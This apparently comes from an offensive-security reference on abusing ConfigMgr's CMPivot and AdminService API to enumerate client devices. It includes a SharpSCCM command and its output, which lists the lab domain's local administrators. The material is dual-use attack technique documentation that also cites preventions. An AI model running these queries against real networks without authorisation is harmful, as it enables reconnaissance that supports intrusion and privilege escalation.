Query client devices via CMPivot
- Run CMPivot permission on the Collection scope
- Read permission on Collections
- Read permission on Inventory Reports
- Read permission on the SMS Scripts object (n/a after version 2107)
- The default scope (n/a after version 2107)
- Target clients require a minimum of PowerShell version 4
- Additional details: https://learn.microsoft.com/en-us/mem/configmgr/core/servers/manage/cmpivot#permissions
CMPivot is part of the ConfigMgr framwework. It allows for real-time collection of data from client devices.
The data collected is based on prebuilt queries, called entities, that are available by default as part of the framework. Queries are made using the Kusto Query Language (KQL), which allows for different filters to be applied to the query results.
These queries allow CMPivot users to read data from remote client devices, including data that could be useful to an attacker, such as Windows event logs, registry values, file contents, and local Administrators group members.
The most common usage of CMPivot is through the Configuration Manager console, where we can:
- Select a target to run CMPivot against (either a single resource or a collection)
- Select a query from the left pane of the CMPivot window or enter one manually in the query pane, including any desired filters
- Run the query on the target client or collection
- Read the data returned by the target in the results pane
In the background, the data obtained from these queries is gathered either through WMI or by running a PowerShell script on the client(s) as SYSTEM.
Additionally ConfigMgr exposes the AdminService REST API, which in turn exposes methods to perform CMPivot queries:
https://{managementPoint}/AdminService/v1.0/Device({deviceId})/AdminService.RunCMPivot
AdminService also allows for retrieving the results of our queries:
https://{managementPoint}/AdminService/v1.0/Collections('{collectionName}')/AdminService.RunCMPivot
With the required permissions, an attacker can leverage CMPivot and/or the AdminService to query data from client hosts within a ConfigMgr site.
These operations allow for enumeration of:
- Active sessions
- Registry keys and values
- Local Administrators group
- Arbitrary file contents
- Windows event logs
And a lot more. There are more than 130 queries available.
- PREVENT-9: Enforce MFA for SMS provider calls
- PREVENT-20: Block unnecessary connections to site systems
Using SharpSCCM to enumerate the local Administrators group from the ConfigMgr client with ID 16777226:
.\SharpSCCM.exe invoke admin-service -r 16777226 -q "Administrators" -sms site-sms -d 10
[+] Sending query to AdminService
[+] URL: "https://site-sms/AdminService/v1.0/Device(16777226)/AdminService.RunCMPivot"
[+] OperationId found: 16777463
[+] Attempt 1 of 5: Checking for query operation to complete
[+] URL: "https://site-sms/AdminService/v1.0/Device(16777226)/AdminService.CMPivotResult(OperationId=16777463)"
[+] 10 seconds until next attempt
[+] Attempt 2 of 5: Checking for query operation to complete
[+] URL: "https://site-sms/AdminService/v1.0/Device(16777226)/AdminService.CMPivotResult(OperationId=16777463)"
[+] 10 seconds until next attempt
[+] Successfully retrieved results from AdminService
Device: SITE-SERVER
ObjectClass: User
Name: MAYYHEM\CAS$
PrincipalSource: ActiveDirectory
----------------------------------------
Device: SITE-SERVER
ObjectClass: Group
Name: MAYYHEM\Domain Admins
PrincipalSource: ActiveDirectory
----------------------------------------
Device: SITE-SERVER
ObjectClass: User
Name: MAYYHEM\sccmadmin
PrincipalSource: ActiveDirectory
----------------------------------------
Device: SITE-SERVER
ObjectClass: User
Name: SITE-SERVER\Administrator
PrincipalSource: Local
----------------------------------------
[+] Completed execution in 00:00:21.1354974
- Microsoft, CMPivot for real-time data in Configuration Manager
- Benoit Lecours, SCCM CMPivot Query Examples
- Microsoft, What is the administration service in ConfigMgr
- Diego Lomellini, Lateral Movement without Lateral Movement